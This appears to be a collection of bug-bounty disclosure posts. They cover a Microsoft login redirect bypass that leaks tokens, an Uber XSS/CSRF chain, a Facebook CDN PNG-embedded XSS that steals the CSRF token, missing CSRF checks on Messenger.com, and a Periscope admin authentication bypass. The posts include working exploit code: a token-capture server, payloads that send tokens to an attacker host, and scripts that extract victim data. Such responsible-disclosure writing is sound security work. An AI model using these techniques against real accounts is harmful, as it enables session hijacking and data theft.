This is pretty similar to Wes’s awesome OAuth CSRF in Live, except it’s in the main Microsoft authentication system rather than the OAuth approval prompt.

Microsoft, being a huge company, have various services spread across multiple domains (*.outlook.com, *.live.com, and so on).

To handle authentication across these services, requests are made to login.live.com, login.microsoftonline.com, and login.windows.net to get a session for the user.

The flow for outlook.office.com is as follows: after the user authenticates on the login domain, an auto-submitting form is returned, which POSTs a token (t) back to the service:

<html>
    <head>
        <noscript>JavaScript required to sign in</noscript>
        <title>Continue</title>
        <script type="text/javascript">
            function OnBack(){}function DoSubmit(){var subt=false;if(!subt){subt=true;document.fmHF.submit();}}
        </script>
    </head>
    <body onload="javascript:DoSubmit();">
        <form name="fmHF" id="fmHF" action="https://outlook.office.com/owa/?wa=wsignin1.0" method="post" target="_self">
            <input type="hidden" name="t" id="t" value="EgABAgMAAAAEgAAAA...">
        </form>
    </body>
</html>
The service then consumes the token and logs the user in.

Since the services are hosted on completely separate domains, and therefore cookies can’t be used, the token is the only value needed to authenticate as a user. This is similar-ish to how OAuth works.

What this means is that if we can get the above code to POST the value of t to a server we control, we can impersonate the user.
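
Just to make the idea concrete, a capture endpoint can be trivially small. The sketch below is purely illustrative (it isn’t from the original exploit, and the port and log file are arbitrary): it accepts any POST and writes the body - including the hidden t value - to disk.

# Minimal token-capture endpoint (illustrative sketch only)
from http.server import BaseHTTPRequestHandler, HTTPServer

class CaptureHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length).decode(errors="replace")
        with open("tokens.log", "a") as f:
            f.write(body + "\n")        # body contains t=EgABAgMAAAAEgAAAA...
        self.send_response(200)
        self.end_headers()

if __name__ == "__main__":
    # In practice this would sit behind TLS on the attacker's domain
    HTTPServer(("0.0.0.0", 8080), CaptureHandler).serve_forever()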

As expected, if we try and change the value of wreply to a non-Microsoft domain, such as example.com, we receive an error, and the request isn’t processed:

Fun with URL-Encoding and URL Parsing

One fun trick to play around with is URL-encoding parameters multiple times. Occasionally this can be used to bypass filters, and it’s the root cause of this bug.

In this case, wreply is URL-decoded before the domain is checked. Therefore https%3a%2f%2foutlook.office.com%2f becomes https://outlook.office.com/, which is valid, and the request goes through.

<form name="fmHF" id="fmHF" action="https://outlook.office.com/?wa=wsignin1.0" method="post" target="_self">

What’s interesting is that when passing a value of https%3a%2f%2foutlook.office.com%252f an error is thrown, since https://outlook.office.com%2f isn’t a valid URL.

However, appending @example.com doesn’t generate an error. Instead, it gives us the following, which is a valid URL:

<form name="fmHF" id="fmHF" action="https://outlook.office.com%2f@example.com/?wa=wsignin1.0" method="post" target="_self">

If you’re wondering why this is valid, it’s because the syntax of a URL is as follows:

scheme:[//[user:password@]host[:port]][/]path[?query][#fragment]
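
To see this concretely, here’s a quick illustration using Python’s urllib (my own snippet, not part of the original write-up) - the parser treats outlook.office.com%2f as the userinfo portion and example.com as the host:

from urllib.parse import urlsplit

parts = urlsplit("https://outlook.office.com%2f@example.com/?wa=wsignin1.0")
print(parts.username)   # outlook.office.com%2f
print(parts.hostname)   # example.com - where the browser would actually send the POST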

From this you can tell that the server is doing two checks:

  • The first is a sanity check on the URL, to ensure it’s valid, which it is, since outlook.office.com%2f is the username part of the URL.

  • The second is to determine whether the domain is allowed. This check should fail - example.com is not allowed - yet it evidently passes.

It’s clear that the server is decoding wreply n times, until there are no longer any encoded characters, and then validating the domain. This sort of inconsistency is something I’m quite familiar with.
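
To illustrate that inconsistency (a rough sketch of my own, using example.com as the attacker host rather than guessing at Microsoft’s actual code): decoding the value once - roughly what ends up in the form action - leaves the browser pointing at the attacker’s domain, while decoding until nothing is left to decode makes the host look like outlook.office.com:

from urllib.parse import unquote, urlsplit

wreply = "https%3a%2f%2foutlook.office.com%252f@example.com%2f"

# Decoded once - what ends up in the form action
once = unquote(wreply)           # https://outlook.office.com%2f@example.com/
print(urlsplit(once).hostname)   # example.com (where the browser actually POSTs)

# Decoded until stable - apparently what the domain check sees
full = once
while unquote(full) != full:
    full = unquote(full)         # https://outlook.office.com/@example.com/
print(urlsplit(full).hostname)   # outlook.office.com (passes the allow-list)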

Now that we can specify an arbitrary URL to POST the token to, the rest is trivial. We set the redirect to https%3a%2f%2foutlook.office.com%252f@poc-ssl.fin1te.net%2fmicrosoft%2f%3f, which results in:

<form name="fmHF" id="fmHF" action="https://outlook.office.com%2f@poc-ssl.fin1te.net/microsoft/?&wa=wsignin1.0" method="post" target="_self">

This causes the token to be sent to our site:

Then we simply replay the token ourselves:

<form action="https://outlook.office.com/owa/?wa=wsignin1.0" method="post">
    <input name="t" value="EgABAgMAAAAEgAAAAwAB...">
    <input type="submit">
</form>

Which then gives us complete access to the user’s account:

Note: The token is only valid for the service which issued it - an Outlook token can’t be used for Azure, for example. But it’d be simple enough to create multiple hidden iframes, each with the login URL set to a different service, and harvest tokens that way.

This was quite a fun CSRF to find and exploit. Despite CSRF bugs not having the same credibility as other bugs, when discovered in authentication systems their impact can be pretty large.

Fix

The hostname in wreply must now end in %2f, which gets URL-decoded to /.

Because that decoded slash terminates the host portion of the URL, anything appended after it (such as @example.com) is treated as part of the path, so the browser only ever sends the request to the intended host.
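
As a quick illustration (again my own snippet, using Python’s urllib and example.com): once the decoded slash sits directly after the host, anything appended afterwards is parsed as path rather than as a new authority section:

from urllib.parse import unquote, urlsplit

decoded = unquote("https%3a%2f%2foutlook.office.com%2f@example.com")
print(decoded)                     # https://outlook.office.com/@example.com
print(urlsplit(decoded).hostname)  # outlook.office.com
print(urlsplit(decoded).path)      # /@example.com - the appended host is inert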

Timeline

  • Sunday, 24th January 2016 - Issue Reported
  • Sunday, 24th January 2016 - Issue Confirmed & Triaged
  • Tuesday, 26th January 2016 - Issue Patched

Now that the Uber bug bounty programme has launched publicly, I can publish some of my favourite submissions, which I’ve been itching to do over the past year. This is part one of maybe two or three posts.

On Uber’s Partners portal, where Drivers can log in and update their details, I found a very simple, classic XSS: changing the value of one of the profile fields to <script>alert(document.domain);</script> causes the code to be executed, and an alert box popped.

This took all of two minutes to find after signing up, but now comes the fun bit.

Self-XSS

Being able to execute additional, arbitrary JavaScript under the context of another site is called Cross-Site Scripting (which I’m assuming 99% of my readers know). Normally you would want to do this against other users in order to yank session cookies, submit XHR requests, and so on.

If you can’t do this against another user - for example, if the code only executes against your own account - then this is known as a self-XSS.

In this case, it would seem that’s what we’ve found. The address section of your profile is only shown to you (the exception may be if an internal Uber tool also displays the address, but that’s another matter), and we can’t update another user’s address to force it to be executed against them.

I’m always hesitant to send in bugs which still have potential (an XSS on this site would be cool), so let’s try to find a way of removing the “self” part from the bug.

Uber OAuth Login Flow

The OAuth flow that Uber uses is pretty typical:

  • User visits an Uber site which requires login, e.g. partners.uber.com
  • User is redirected to the authorisation server, login.uber.com
  • User enters their credentials
  • User is redirected back to partners.uber.com with a code, which can then be exchanged for an access token

In case you haven’t spotted it from the above screenshot, the OAuth callback, /oauth/callback?code=..., doesn’t use the recommended state parameter. This introduces a CSRF vulnerability in the login function, which may or may not be considered an important issue.
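
For reference, the usual mitigation looks something like the sketch below (my illustration of the standard pattern, not Uber’s code; the authorisation URL and parameter layout are placeholders): generate a random state per login attempt, stash it in the session, and refuse any callback whose state doesn’t match.

import secrets

def build_authorize_url(session):
    # Remember a per-login nonce in the user's session and send it along
    session["oauth_state"] = secrets.token_urlsafe(32)
    return ("https://login.uber.com/oauth/authorize"        # placeholder path
            "?response_type=code&client_id=CLIENT_ID"
            "&redirect_uri=https%3A%2F%2Fpartners.uber.com%2Foauth%2Fcallback"
            "&state=" + session["oauth_state"])

def handle_callback(session, params):
    # A mismatched (or missing) state means the code wasn't requested by this
    # browser session - exactly the login-CSRF scenario described above
    if params.get("state") != session.pop("oauth_state", None):
        raise ValueError("state mismatch - possible login CSRF")
    return params["code"]   # safe to exchange for an access token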

In addition, there is a CSRF vulnerability in the logout function, which really isn’t considered an issue. Browsing to /logout destroys the user’s partners.uber.com session, and performs a redirect to the same logout function on login.uber.com.

Since our payload is only available inside our account, we want to log the user into our account, which in turn will execute the payload. However, logging them into our account destroys their session, which destroys a lot of the value of the bug (it’s no longer possible to perform actions on their account). So let’s chain these three minor issues (a self-XSS and two CSRFs) together.

For more info on OAuth security, check out @homakov’s awesome guide.

Chaining Minor Bugs

Our plan has three parts to it:

  • First, log the user out of their partner.uber.com session, but not their login.uber.com session. This ensures that we can log them back into their account
  • Second, log the user into our account, so that our payload will be executed
  • Finally, log them back into their account, whilst our code is still running, so that we can access their details

Step 1. Logging Out of Only One Domain

We first want to issue a request to https://partners.uber.com/logout/, so that we can then log them into our account. The problem is that issuing a request to this end-point results in a 302 redirect to https://login.uber.com/logout/, which destroys the session. We can’t intercept each redirect and drop the request, since the browser follows these implicitly.

However, one trick we can do is to use Content Security Policy to define which sources are allowed to be loaded (I hope you can see the irony in using a feature designed to help mitigate XSS in this context).

We’ll set our policy to only allow requests to partners.uber.com, which will block https://login.uber.com/logout/.

<!-- Set content security policy to block requests to login.uber.com, so the target maintains their session -->
<meta http-equiv="Content-Security-Policy" content="img-src https://partners.uber.com">
<!-- Logout of partners.uber.com -->
<img src="https://partners.uber.com/logout/">

This works, as indicated by the CSP violation error message:

Step 2. Logging Into Our Account

This one is relatively simple. We issue a request to https://partners.uber.com/login/ to initiate a login (this is needed, otherwise the application won’t accept the callback). Using the CSP trick we prevent the flow from being completed, then we feed in our own code (which can be obtained by logging into our own account), which logs them into our account.

Since a CSP violation triggers the onerror event handler, this will be used to jump to the next step.

<!-- Set content security policy to block requests to login.uber.com, so the target maintains their session -->
<meta http-equiv="Content-Security-Policy" content="img-src partners.uber.com">
<!-- Logout of partners.uber.com -->
<img src="https://partners.uber.com/logout/" onerror="login();">
<script>
    //Initiate login so that we can redirect them
    var login = function() {
        var loginImg = document.createElement('img');
        loginImg.src = 'https://partners.uber.com/login/';
        loginImg.onerror = redir;
    }
    //Redirect them to login with our code
    var redir = function() {
        //Get the code from the URL to make it easy for testing
        var code = window.location.hash.slice(1);
        var loginImg2 = document.createElement('img');
        loginImg2.src = 'https://partners.uber.com/oauth/callback?code=' + code;
        loginImg2.onerror = function() {
            //Redirect to the profile page with the payload
            window.location = 'https://partners.uber.com/profile/';
        }
    }
</script>

Step 3. Switching Back to Their Account

This part is the code that will be contained as the XSS payload, stored in our account.

As soon as this payload is executed, we can switch back to their account. This must be in an iframe - we need to be able to continue running our code.

//Create the iframe to log the user out of our account and back into theirs
var loginIframe = document.createElement('iframe');
loginIframe.setAttribute('src', 'https://fin1te.net/poc/uber/login-target.html');
document.body.appendChild(loginIframe);

The content of the iframe uses the CSP trick again:

<!-- Set content security policy to block requests to login.uber.com, so the target maintains their session -->
<meta http-equiv="Content-Security-Policy" content="img-src partners.uber.com">
<!-- Log the user out of our partner account -->
<img src="https://partners.uber.com/logout/" onerror="redir();">
<script>
    //Log them into partners via their session on login.uber.com
    var redir = function() {
        window.location = 'https://partners.uber.com/login/';
    };
</script>

The final piece is to create another iframe, so we can grab some of their data.

//Wait a few seconds, then load the profile page, which is now *their* profile
setTimeout(function() {
    var profileIframe = document.createElement('iframe');
    profileIframe.setAttribute('src', 'https://partners.uber.com/profile/');
    profileIframe.setAttribute('id', 'pi');
    document.body.appendChild(profileIframe);
    //Extract their email as PoC
    profileIframe.onload = function() {
        var d = document.getElementById('pi').contentWindow.document.body.innerHTML;
        var matches = /value="([^"]+)" name="email"/.exec(d);
        alert(matches[1]);
    }
}, 9000);

Since our final iframe is loaded from the same origin as the Profile page containing our JS, and X-Frame-Options is set to sameorigin rather than deny, we can access the content inside it (using contentWindow).

Putting It All Together

After combining all the steps, we have the following attack flow:

  • Add the payload from step 3 to our profile
  • Log in to our account, but cancel the callback and make a note of the unused code parameter
  • Get the user to visit the file we created from step 2 - this is similar to how you would execute a reflected-XSS against someone
  • The user will then be logged out, and logged into our account
  • The payload from step 3 will be executed
  • In a hidden iframe, they’ll be logged out of our account
  • In another hidden iframe, they’ll be logged into their account
  • We now have an iframe, in the same origin containing the user’s session

This was a fun bug, and proves that it’s worth persevering to show a bug can have a higher impact than originally thought.

Content uploaded to Facebook is stored on their CDN, which is served via various domains (most of which are sub-domains of either akamaihd.net or fbcdn.net).

The captioning feature of Videos also stores the .srt files on the CDN, and I noticed that right angle brackets were left unencoded.

https://fbcdn-dragon-a.akamaihd.net/hphotos-ak-xaf1/….srt

I was trying to think of ways to get the file interpreted as HTML. Maybe MIME sniffing (since there’s no X-Content-Type-Options header)?

It’s actually a bit easier than that. We can just change the extension to .html (which probably shouldn’t be possible…).

https://fbcdn-dragon-a.akamaihd.net/hphotos-ak-xaf1/t39.2093-6/….html

Unfortunately left angle brackets are stripped out (which I later found out was due to @phwd’s very much related finding), so there’s not much we can do here. Instead, I looked for other files which could also be loaded as text/html.

A lot of the photos/videos on Facebook now seem to contain a hash in the URL (parameters oh and __gda__), which causes an error to be thrown if we modify the file extension.

Luckily, advert images don’t contain these parameters.

All that we have to do now is find a way to embed some HTML into an image. The trouble is that Exif data is stripped out of JPEGs, and iTXt chunks are stripped out of PNGs.

If we try to blindly insert a string into an image and upload it we receive an error.

PNG IDAT Chunks

I started searching for ideas and came across this great blog post: “Encoding Web Shells in PNG IDAT chunks”. This part of the bug is made possible thanks to that post, so props to the author.

The post describes encoding data into the IDAT chunk, which ensures it’ll stay there even after the modifications Facebook’s image uploader makes.

The author kindly provides a proof-of-concept image, which worked perfectly (the PHP shell obviously won’t execute, but it demonstrates that the data survived uploading).

Now, I could have submitted the bug there and then - we’ve got proof that images can be served with a content type of text/html, and angle brackets aren’t encoded (which means we can certainly inject HTML).

But that’s boring, and everyone knows an XSS isn’t an XSS without an alert box.

The author also provides an XSS-ready PNG, which I could just upload and be done. But since it references a remote JS file, I wasn’t too keen on the bug showing up in a referer log. Plus I wanted to try creating one of these images myself.

As mentioned in the post, the first step is to craft a string that, when compressed using DEFLATE, produces the desired output, which in this case is:

<SCRIPT SRC=//FNT.PE></script>

Rather than trying to create this by hand, I used a brute-force solution - I’m sure there are much better ways, but I wanted to whip up a script and leave it running. The approach (sketched in code after the list) was:

  • Convert the desired output to hex - 3c534352495054205352433d2f2f464e542e50453e3c2f7363726970743e
  • Prepend 0x00 -> 0xff to the string (one to two times)
  • Append 0x00 -> 0xff to the string (one to two times)
  • Attempt to uncompress the string until an error isn’t thrown
  • Check that the result contains our expected string
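
The original script isn’t included here, but a rough Python reconstruction of those steps might look like the following (treat it as a sketch of the idea rather than the actual tool; it pads with a single byte on each side for brevity):

import itertools
import zlib

# <SCRIPT SRC=//FNT.PE></script>
payload = bytes.fromhex("3c534352495054205352433d2f2f464e542e50453e3c2f7363726970743e")

def deflate(data):
    # Raw DEFLATE, equivalent to PHP's gzdeflate()
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()

def inflate(data):
    # Raw DEFLATE decompression, equivalent to PHP's gzinflate()
    return zlib.decompress(data, -15)

for prefix, suffix in itertools.product(range(256), repeat=2):
    candidate = bytes([prefix]) + payload + bytes([suffix])
    try:
        raw = inflate(candidate)       # most candidates aren't valid DEFLATE data
    except zlib.error:
        continue
    if payload in deflate(raw):        # re-compressing must give our payload back
        print(raw.hex())
        break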

My script took a while to run, but it produced the following output:

7ff399281922111510691928276e6e5c1e151e51241f576e69b16375535b6f

Compressing the above confirms that we get our string back:

fin1te@mbp /tmp » php -r "echo gzdeflate(hex2bin('7ff399281922111510691928276e6e5c1e151e51241f576e69b16375535b6f')) . PHP_EOL;"
??<SCRIPT SRC=//FNT.PE></script>
    

Combining the result with the PHP code for reversing PNG filters and generating the image gives us the following:

Which, when dumped, shows our payload:

fin1te@mbp /tmp » hexdump -C xss-fnt-pe-png.png
00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.PNG........IHDR|
00000010  00 00 00 20 00 00 00 20  08 02 00 00 00 fc 18 ed  |... ... ........|
00000020  a3 00 00 00 09 70 48 59  73 00 00 0e c4 00 00 0e  |.....pHYs.......|
00000030  c4 01 95 2b 0e 1b 00 00  00 65 49 44 41 54 48 89  |...+.....eIDATH.|
00000040  63 ac ff 3c 53 43 52 49  50 54 20 53 52 43 3d 2f  |c..<SCRIPT SRC=/|
00000050  2f 46 4e 54 2e 50 45 3e  3c 2f 73 63 72 69 70 74  |/FNT.PE></script|
00000060  3e c3 ea c0 46 8d 17 f3  af de 3d 73 d3 fd 15 cb  |>...F.....=s....|
00000070  43 2f 0f b5 ab a7 af ca  7e 7d 2d ea e2 90 22 ae  |C/......~}-...".|
00000080  73 85 45 60 7a 90 d1 8c  3f 0c a3 60 14 8c 82 51  |s.E`z...?..`...Q|
00000090  30 0a 46 c1 28 18 05 a3  60 14 8c 82 61 00 00 78  |0.F.(...`...a..x|
000000a0  32 1c 02 78 65 1f 48 00  00 00 00 49 45 4e 44 ae  |2..xe.H....IEND.|
000000b0  42 60 82                                          |B`.|
    

We can then upload it to our advertiser library, and browse to it (with an extension of .html).

What can you do with an XSS on a CDN domain? Not a lot.

All I could come up with is a LinkShim bypass. LinkShim is a script/tool which all external links on Facebook are forced through; it then checks for malicious content.

CDN URLs, however, aren’t LinkShim’d, so we can use this as a bypass.

Moving from the Akamai CDN hostname to *.facebook.com

Redirects are pretty boring. So I thought I’d check to see if any *.facebook.com DNS entries were pointing to the CDN.

I found photo.facebook.com (I forgot to screenshot the output of dig before the patch, so here’s an entry from Google’s cache):

Browsing to this host with our image as the path loads a JavaScript file from fnt.pe, which then displays an alert box with the hostname.

Any session cookies are marked as HTTPOnly, and we can’t make requests to www.facebook.com. What do we do other than popping an alert box?

Enter document.domain

It’s possible for two pages from different origins, but sharing the same parent domain, to interact with each other, provided they both set the document.domain property to the parent domain.

We can easily do this for our page, since we can run arbitrary JavaScript. But we also need to find a page on www.facebook.com which does the same, and doesn’t have an X-Frame-Options header set to DENY or SAMEORIGIN (we’re still cross-origin at this point).

This wasn’t too difficult to find - Facebook has various plugins which are meant to be placed inside an <iframe>.

We can use the Page Plugin. It sets the document.domain property, and also contains fb_dtsg (the CSRF token Facebook uses).

What we now need to do is load the plugin inside an iframe, wait for the onload event to fire, and extract the token from the content.

document.domain = 'facebook.com';

var i = document.createElement('iframe');
i.setAttribute('id', 'i');
i.setAttribute('style', 'visibility:hidden;width:0px;height:0px;');
i.setAttribute('src', 'https://www.facebook.com/v2.4/plugins/page.php?adapt_container_width=true&app_id=113869198637480&channel=https%3A%2F%2Fs-static.ak.facebook.com%2Fconnect%2Fxd_arbiter%2FX9pYjJn4xhW.js%3Fversion%3D41%23cb%3Df365065abc%26domain%3Ddevelopers.facebook.com%26origin%3Dhttps%253A%252F%252Fdevelopers.facebook.com%252Ff366e4bcac%26relation%3Dparent.parent&container_width=588&hide_cover=false&href=https%3A%2F%2Fwww.facebook.com%2Ffacebook&locale=en_GB&sdk=joey&show_facepile=true&show_posts=true&small_header=false');

i.onload = function(){
    alert(document.domain + "\nfb_dtsg: " + i.contentWindow.document.getElementsByName('fb_dtsg')[0].value);
};

document.body.appendChild(i);

Notice how the alert box now shows facebook.com, not photo.facebook.com.

We now have access to the user’s CSRF token, which means we can make arbitrary requests on their behalf (such as posting a status, etc).

It’s also possible to issue XHR requests via the iframe to extract data from www.facebook.com (rather than blindly post data with the token).

So it turns out an XSS on the CDN can do pretty much everything that one on the main site can.

Fix

Facebook quickly hot-fixed the issue by removing the forward DNS entry for photo.facebook.com.

Whilst the content type issue still exists, it’s a lot less severe since the files are hosted on a sandboxed domain.

Bonus ASCII Art

One easter-egg I found was that if you append .txt or .html to the URL (rather than replace the file extension), you get a cool ASCII art version of the image. This also works for images on Instagram (since they share the same CDN).

Try it out yourself:

I originally wasn’t going to publish this, but @phwd wanted to hear about some of my recent bugs so this post is dedicated to him.

This issue was also found by @mazen160, who blogged about it back in June.

When Messenger.com launched back in April, I quickly had a look for any low-hanging fruit.

One of the first things to do is check end-points for Cross-Site Request Forgery issues. This is whereby an attacker can abuse the fact that cookies are implicitly sent with a request (regardless of where the request is made from), and perform actions on another user’s behalf, such as sending a message or updating a status.

There are different ways of mitigating this (with varying results), but usually it’s achieved by sending a non-guessable token with each request, and either comparing it to a value stored server-side, or decrypting it and verifying the contents.

The way I normally check for these is as follows:

  1. Perform the request without modifying the parameters, so we can see what the expected result is
  2. Remove the CSRF token completely (in this case, the fb_dtsg parameter)
  3. Modify one of the characters in the token (but keep the length the same)
  4. Remove the value of the token (but leave the parameter in place)
  5. Convert to a GET request

If any of the above steps produce the same result as #1 then we know that the end-point is likely to be vulnerable (there are some instances where you might get a successful-looking response even though no data has actually been modified, so it’s worth confirming the action really took effect).
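
A rough sketch of that routine in Python (my own illustration; the end-point is the one tested below, while the cookie names and token value are placeholders):

import requests

URL = "https://www.messenger.com/settings/edit/"
COOKIES = {"c_user": "...", "xs": "..."}   # placeholder session cookies

baseline = {"fb_dtsg": "VALID_TOKEN", "settings[sound_enabled]": "false", "__a": "1"}

variants = {
    "1. unmodified":    baseline,
    "2. token removed": {k: v for k, v in baseline.items() if k != "fb_dtsg"},
    "3. token mangled": {**baseline, "fb_dtsg": "X" + baseline["fb_dtsg"][1:]},
    "4. token empty":   {**baseline, "fb_dtsg": ""},
}

for name, data in variants.items():
    r = requests.post(URL, data=data, cookies=COOKIES)
    print(name, r.status_code, r.text[:80])

# 5. the GET variant
r = requests.get(URL, params=baseline, cookies=COOKIES)
print("5. as GET", r.status_code, r.text[:80])

# If any of 2-5 match the unmodified response, the token probably isn't checked.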

Normally, on Facebook, the response is one of two things, depending on whether the request is an AJAX request or not (indicated by the __a parameter).

Either a redirect to /common/invalid_request.php:

Or an error message:

I submitted the following request to change the sound_enabled setting, without fb_dtsg:

POST /settings/edit/ HTTP/1.1
Host: www.messenger.com
Content-Type: application/x-www-form-urlencoded

settings[sound_enabled]=false&__a=1

Which surprisingly gave me the following response:

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 3559

for (;;);{"__ar":1,"payload":[],"jsmods":{"instances":[["m_a_0",["MarketingLogger"],[null,{"is_mobile":false,"controller_name":"XMessengerDotComSettingsEditController"
...

I tried another end-point, this time to remove a user from a group thread.

POST /chat/remove_participants/?uid=100...&tid=153... HTTP/1.1
Host: www.messenger.com
Content-Type: application/x-www-form-urlencoded

__a=1

Which also worked:

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 136

for (;;);{"__ar":1,"payload":null,"domops":[["replace","^.fbProfileBrowserListItem",true,null]],"bootloadable":{},"ixData":{},"lid":"0"}

After trying one more I realised that the check was missing on every request.

Fix

Simple and quick fix - tokens are now properly checked on every request.

I haven’t blogged for quite some time, so I thought it was worth re-launching with an interesting, albeit simple, high-impact bug.

Periscope is an iOS/Android app, owned by Twitter, used for live streaming. To manage the millions of users, a web-based administration panel is used, accessible at admin.periscope.tv.

When you browse to the site, all requests are redirected to /auth?redirect=/ (since we don’t have a valid session), which in turn redirects to Google for authentication.

The URL we’re redirected to, shown below, contains various parameters, but the most interesting one is hd. This is used to restrict logins to a specific domain, in this case bountyapp.co.

https://accounts.google.com/o/oauth2/auth?access_type=
&approval_prompt=
&client_id=57569323683-c0hvkac6m15h3u3l53u89vpquvjiu8sb.apps.googleusercontent.com
&hd=bountyapp.co
&redirect_uri=https%3A%2F%2Fadmin.periscope.tv%2Fauth%2Fcallback
&response_type=code
&scope=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fplus.login+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.profile
&state=%2FStreams
    

If we try to log in with an account such as test@gmail.com, we’re redirected back to the account selection page, and if we try again we get redirected back to the same place, and so on.

However, we can simply remove this parameter. There’s no signature in the URL to prevent us from making modifications, and as indicated in the documentation, the onus is on the application to validate the returned token.

This gives us the following login URL (you may also notice I’ve removed the Google+ scope; this is purely because my test account isn’t signed up for it):

https://accounts.google.com/o/oauth2/auth?access_type=
&approval_prompt=
&client_id=57569323683-c0hvkac6m15h3u3l53u89vpquvjiu8sb.apps.googleusercontent.com
&redirect_uri=https%3A%2F%2Fadmin.periscope.tv%2Fauth%2Fcallback
&response_type=code
&scope=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.profile
&state=%2FStreams
    

Browsing to this new URL prompts us to authorise the application.

After clicking “Accept”, a redirect is issued back to the administration panel, with our code as a parameter.

This is where the application should then exchange the code for an access token, and validate the returned user ID against either a whitelist, or at the very least verify that the domain is bountyapp.co.

But, in this case, the assumption is made that if you managed to login, you are an employee with an @bountyapp.co email.

The requested userinfo.profile permission doesn’t contain the user’s email address, so the application couldn’t validate it even if it tried.

This then presents us with the admin panel.

From here we can now manage various aspects of Periscope, including users and streams.

Fix

Twitter fixed this by making two changes. The first is to request an additional permission:

https://www.googleapis.com/auth/userinfo.email
    

The second is to correctly validate the user on callback.
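
A minimal sketch of what that callback-side validation might look like (my illustration, not Twitter’s actual code; the client credentials are placeholders, and the token/userinfo endpoints are Google’s documented ones): exchange the code, fetch the profile with the email scope, and reject anyone outside the expected domain.

import requests

CLIENT_ID = "..."       # placeholder
CLIENT_SECRET = "..."   # placeholder

def handle_callback(code):
    # Exchange the authorisation code for an access token
    token = requests.post("https://oauth2.googleapis.com/token", data={
        "code": code,
        "client_id": CLIENT_ID,
        "client_secret": CLIENT_SECRET,
        "redirect_uri": "https://admin.periscope.tv/auth/callback",
        "grant_type": "authorization_code",
    }).json()["access_token"]

    # With the userinfo.email scope, the profile includes the email address
    # and (for Google Apps accounts) the hosted domain, "hd"
    profile = requests.get(
        "https://www.googleapis.com/oauth2/v2/userinfo",
        headers={"Authorization": "Bearer " + token},
    ).json()

    # The check that was missing: only accept the expected domain
    if profile.get("hd") != "bountyapp.co":
        raise PermissionError("401 Unauthorized")
    return profile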

Now, the application returns a 401 when trying to authenticate with an invalid user:

HTTP/1.1 401 Unauthorized
Content-Type: text/html; charset=utf-8
Location: /Login
Strict-Transport-Security: max-age=31536000; preload
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Xss-Protection: 1; mode=block
Content-Length: 36

<a href="/Login">Unauthorized</a>.